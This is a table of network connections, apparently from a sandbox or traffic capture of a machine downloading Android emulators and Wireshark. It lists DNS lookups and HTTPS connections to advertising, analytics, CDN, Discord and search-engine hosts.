| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | tr.blismedia.com | udp |
| US | 52.46.143.56:443 | s.amazon-adsystem.com | tcp |
| US | 34.96.105.8:443 | tr.blismedia.com | tcp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | id.a-mx.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 79.127.227.46:443 | id.a-mx.com | tcp |
| IE | 54.171.112.191:443 | ap.lijit.com | tcp |
| US | 8.8.8.8:53 | ads.betweendigital.com | udp |
| NL | 188.42.189.197:443 | ads.betweendigital.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | apien.ldmnq.com | udp |
| US | 8.8.8.8:53 | image4.pubmatic.com | udp |
| GB | 185.64.190.81:443 | image4.pubmatic.com | tcp |
| GB | 13.224.132.126:443 | apien.ldmnq.com | tcp |
| US | 8.8.8.8:53 | 20.165.5.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.242.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.113.38.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.149.71.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.202.215.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.57.122.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.105.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.143.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.227.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.112.171.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.190.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pb-am.a-mo.net | udp |
| US | 8.8.8.8:53 | dmp.adform.net | udp |
| US | 8.8.8.8:53 | trc.taboola.com | udp |
| US | 8.8.8.8:53 | dmp.v.fwmrm.net | udp |
| US | 8.8.8.8:53 | sync.smartadserver.com | udp |
| US | 8.8.8.8:53 | aa.agkn.com | udp |
| US | 8.8.8.8:53 | beacon.krxd.net | udp |
| US | 8.8.8.8:53 | usermatch.krxd.net | udp |
| US | 8.8.8.8:53 | i.liadm.com | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | ad4m.at | udp |
| US | 8.8.8.8:53 | casale-match.dotomi.com | udp |
| US | 8.8.8.8:53 | dmp.brand-display.com | udp |
| NL | 147.75.84.158:443 | pb-am.a-mo.net | tcp |
| US | 151.101.129.44:443 | trc.taboola.com | tcp |
| DK | 37.157.5.84:443 | dmp.adform.net | tcp |
| IE | 54.171.118.212:443 | dpm.demdex.net | tcp |
| US | 8.8.8.8:53 | obgpm76tt0a0sgozk8l.redinuid.imrworldwide.com | udp |
| DE | 3.73.136.118:443 | aa.agkn.com | tcp |
| GB | 18.172.153.76:443 | cdn.ldplayer.net | tcp |
| NL | 81.17.55.106:443 | sync.smartadserver.com | tcp |
| US | 34.234.127.232:443 | i.liadm.com | tcp |
| US | 34.160.19.107:443 | dmp.brand-display.com | tcp |
| NL | 89.207.16.137:443 | casale-match.dotomi.com | tcp |
| US | 104.26.11.209:443 | ad4m.at | tcp |
| US | 3.231.143.34:443 | dmp.v.fwmrm.net | tcp |
| IE | 54.195.139.232:443 | obgpm76tt0a0sgozk8l.redinuid.imrworldwide.com | tcp |
| GB | 18.172.153.76:443 | cdn.ldplayer.net | tcp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| US | 8.8.8.8:53 | ocsp.r2m01.amazontrust.com | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| GB | 143.204.67.183:80 | ocsp.r2m01.amazontrust.com | tcp |
| US | 8.8.8.8:53 | cm.adgrx.com | udp |
| IE | 52.215.155.11:443 | cm.adgrx.com | tcp |
| US | 8.8.8.8:53 | dsum.casalemedia.com | udp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 8.8.8.8:53 | 126.132.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.tribalfusion.com | udp |
| US | 8.8.8.8:53 | 44.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.84.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.5.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.118.171.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.136.73.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.139.195.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.127.234.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.143.231.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.111.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.67.204.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.155.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | matching.truffle.bid | udp |
| US | 104.18.25.173:443 | a.tribalfusion.com | tcp |
| US | 104.18.25.173:443 | a.tribalfusion.com | tcp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | as.ck-ie.com | udp |
| US | 8.8.8.8:53 | uipglob.semasio.net | udp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | pixel.onaudience.com | udp |
| US | 8.2.110.113:443 | as.ck-ie.com | tcp |
| US | 8.2.110.113:443 | as.ck-ie.com | tcp |
| FR | 54.38.113.7:443 | pixel.onaudience.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | s.tribalfusion.com | udp |
| US | 104.18.25.173:443 | s.tribalfusion.com | udp |
| GB | 18.245.143.118:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.25.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.51.243.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | idsync.frontend.weborama.fr | udp |
| US | 8.8.8.8:53 | 8proof.com | udp |
| US | 34.111.131.239:443 | idsync.frontend.weborama.fr | tcp |
| US | 34.111.131.239:443 | idsync.frontend.weborama.fr | tcp |
| US | 52.116.53.150:443 | 8proof.com | tcp |
| US | 8.8.8.8:53 | simage4.pubmatic.com | udp |
| US | 52.116.53.150:443 | 8proof.com | tcp |
| US | 8.8.8.8:53 | ps.eyeota.net | udp |
| DE | 52.57.150.20:443 | ps.eyeota.net | tcp |
| US | 8.8.8.8:53 | id.rtb.mx | udp |
| DE | 52.57.150.20:443 | ps.eyeota.net | tcp |
| DE | 79.127.216.47:443 | id.rtb.mx | tcp |
| US | 8.8.8.8:53 | 239.131.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.53.116.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ow.pubmatic.com | udp |
| NL | 185.64.189.116:443 | ow.pubmatic.com | tcp |
| US | 8.8.8.8:53 | d.turn.com | udp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| US | 8.8.8.8:53 | 20.150.57.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.216.127.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.189.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.110.2.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vid.vidoomy.com | udp |
| GB | 195.181.164.15:443 | vid.vidoomy.com | tcp |
| GB | 195.181.164.15:443 | vid.vidoomy.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 104.18.38.233:80 | crt.sectigo.com | tcp |
| US | 104.18.38.233:80 | crt.sectigo.com | tcp |
| US | 8.8.8.8:53 | 15.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | user-sync.adxpremium.services | udp |
| US | 209.192.201.180:443 | user-sync.adxpremium.services | tcp |
| US | 8.8.8.8:53 | vpaid.vidoomy.com | udp |
| GB | 89.187.167.4:443 | vpaid.vidoomy.com | tcp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.201.192.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.vidoomy.com | udp |
| ES | 212.36.83.246:443 | a.vidoomy.com | tcp |
| US | 8.8.8.8:53 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i1-v6exp3.v4.metric.gstatic.com | udp |
| US | 8.8.8.8:53 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i2-v6exp3.ds.metric.gstatic.com | udp |
| ES | 212.36.83.246:443 | a.vidoomy.com | tcp |
| GB | 216.58.212.242:443 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i1-v6exp3.v4.metric.gstatic.com | tcp |
| GB | 216.58.201.114:443 | p4-hsidf3slx6c5y-ibspcd5l6m5eb2yt-994473-i2-v6exp3.ds.metric.gstatic.com | tcp |
| ES | 212.36.83.246:443 | a.vidoomy.com | tcp |
| US | 8.8.8.8:53 | 246.83.36.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.201.58.216.in-addr.arpa | udp |
| CN | 14.215.183.79:443 | hm.baidu.com | tcp |
| CN | 14.215.183.79:443 | hm.baidu.com | tcp |
| CN | 14.215.183.79:443 | hm.baidu.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | middledata.ldplayer.net | udp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 97.136.219.8.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| GB | 142.250.187.246:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | csm.nl3.eu.criteo.net | udp |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | 246.187.250.142.in-addr.arpa | udp |
| NL | 178.250.1.25:443 | csm.nl3.eu.criteo.net | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.246:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 25.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 142.250.178.10:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| CN | 183.240.98.228:443 | hm.baidu.com | tcp |
| CN | 183.240.98.228:443 | hm.baidu.com | tcp |
| CN | 183.240.98.228:443 | hm.baidu.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | www.wireshark.org | udp |
| US | 104.26.11.240:443 | www.wireshark.org | tcp |
| US | 104.26.11.240:443 | www.wireshark.org | tcp |
| US | 104.26.11.240:443 | www.wireshark.org | udp |
| US | 8.8.8.8:53 | ticketing.wireshark.org | udp |
| US | 8.8.8.8:53 | 240.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.na.dl.wireshark.org | udp |
| US | 5.78.100.21:443 | 2.na.dl.wireshark.org | tcp |
| US | 5.78.100.21:443 | 2.na.dl.wireshark.org | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 21.100.78.5.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.26.11.240:443 | ticketing.wireshark.org | tcp |
| CN | 111.45.3.198:443 | hm.baidu.com | tcp |
| CN | 111.45.3.198:443 | hm.baidu.com | tcp |
| CN | 111.45.3.198:443 | hm.baidu.com | tcp |
| GB | 216.58.213.14:80 | www.google-analytics.com | tcp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| CN | 14.215.182.140:443 | hm.baidu.com | tcp |
| CN | 14.215.182.140:443 | hm.baidu.com | tcp |
| CN | 14.215.182.140:443 | hm.baidu.com | tcp |
| US | 8.8.8.8:53 | middledata.ldplayer.net | udp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| US | 8.8.8.8:53 | ad.ldplayer.net | udp |
| US | 8.8.8.8:53 | cdn.ldplayer.net | udp |
| US | 8.8.8.8:53 | en.ldplayer.net | udp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| GB | 79.133.176.225:443 | en.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| US | 8.8.8.8:53 | advertise.ldplayer.net | udp |
| GB | 79.133.176.235:443 | advertise.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 30.153.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.130.234:443 | discord.gg | tcp |
| US | 162.159.130.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | res.ldplayer.net | udp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 104.16.79.73:443 | cloudflareinsights.com | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 235.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | beacons5.gvt3.com | udp |
| GB | 216.58.213.3:443 | beacons5.gvt3.com | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| SG | 8.219.136.97:443 | middledata.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encdn.ldmnq.com | udp |
| GB | 18.172.153.10:443 | encdn.ldmnq.com | tcp |
| GB | 79.133.176.235:443 | advertise.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 10.153.172.18.in-addr.arpa | udp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| GB | 18.172.153.10:443 | encdn.ldmnq.com | tcp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| US | 163.181.154.180:443 | res.ldplayer.net | tcp |
| GB | 18.172.153.30:443 | cdn.ldplayer.net | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apien.ldmnq.com | udp |
| GB | 13.224.132.126:80 | apien.ldmnq.com | tcp |
| GB | 13.224.132.126:443 | apien.ldmnq.com | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 13.224.132.126:443 | apien.ldmnq.com | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| N/A | 127.0.0.1:6463 | tcp | |
| N/A | 127.0.0.1:6464 | tcp | |
| N/A | 127.0.0.1:6465 | tcp | |
| N/A | 127.0.0.1:6466 | tcp | |
| N/A | 127.0.0.1:6467 | tcp | |
| N/A | 127.0.0.1:6468 | tcp | |
| N/A | 127.0.0.1:6469 | tcp | |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| N/A | 127.0.0.1:6470 | tcp | |
| N/A | 127.0.0.1:6471 | tcp | |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| N/A | 127.0.0.1:6472 | tcp | |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| GB | 18.165.201.123:443 | ad.ldplayer.net | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.97:443 | r.bing.com | tcp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 204.79.197.200:443 | bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.pchelpsoft.com | udp |
| US | 172.67.73.195:443 | www.pchelpsoft.com | tcp |
| US | 172.67.73.195:443 | www.pchelpsoft.com | tcp |
| US | 172.67.73.195:443 | www.pchelpsoft.com | tcp |
| US | 8.8.8.8:53 | 195.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | cloud.pchelpsoft.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| US | 8.8.8.8:53 | 207.10.18.104.in-addr.arpa | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 216.239.34.21:443 | cloud.pchelpsoft.com | tcp |
| US | 104.26.0.100:443 | get.geojs.io | tcp |
| GB | 216.58.212.202:443 | ajax.googleapis.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store.pchelpsoft.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| CA | 64.18.87.10:443 | store.pchelpsoft.com | tcp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 10.87.18.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.clarity.ms | udp |
| US | 13.107.246.64:443 | www.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| IE | 13.74.129.1:443 | c.clarity.ms | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 1.129.74.13.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | analytics.fatmedia.io | udp |
| US | 8.8.8.8:53 | privacyportal-eu.onetrust.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 216.239.34.21:443 | analytics.fatmedia.io | tcp |
| US | 104.18.32.137:443 | privacyportal-eu.onetrust.com | tcp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | r.bing.com | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| NL | 20.190.160.22:443 | login.microsoftonline.com | tcp |
| NL | 20.190.160.22:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.19.252.146:443 | aefd.nelreports.net | tcp |
| US | 2.19.252.146:443 | aefd.nelreports.net | tcp |
| US | 2.19.252.146:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 146.252.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pc-androidemulator.com | udp |
| DE | 77.37.53.96:443 | pc-androidemulator.com | tcp |
| DE | 77.37.53.96:443 | pc-androidemulator.com | tcp |
| US | 8.8.8.8:53 | 96.53.37.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 172.67.199.186:443 | privacy.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 15.188.219.54:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| GB | 142.250.187.238:443 | www.youtube.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 172.67.142.121:443 | go.ezodn.com | tcp |
| US | 8.8.8.8:53 | 186.199.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.219.188.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.142.67.172.in-addr.arpa | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | tcp |
| GB | 142.250.187.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 32.42.21.104.in-addr.arpa | udp |
| FR | 15.188.219.54:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| DE | 91.228.74.244:443 | secure.quantserve.com | tcp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| GB | 18.245.187.126:443 | rules.quantcount.com | tcp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | 244.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.187.245.18.in-addr.arpa | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | smartgaga-android-emulator.en.softonic.com | udp |
| US | 151.101.65.91:443 | smartgaga-android-emulator.en.softonic.com | tcp |
| US | 151.101.65.91:443 | smartgaga-android-emulator.en.softonic.com | tcp |
| US | 151.101.65.91:443 | smartgaga-android-emulator.en.softonic.com | udp |
| US | 8.8.8.8:53 | 91.65.101.151.in-addr.arpa | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| US | 8.8.8.8:53 | sc.sftcdn.net | udp |
| US | 8.8.8.8:53 | softonic.com | udp |
| US | 172.64.154.167:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | sdk.privacy-center.org | udp |
| US | 151.101.129.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.129.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.129.91:443 | sc.sftcdn.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
| US | 23.219.230.135:443 | images.sftcdn.net | tcp |
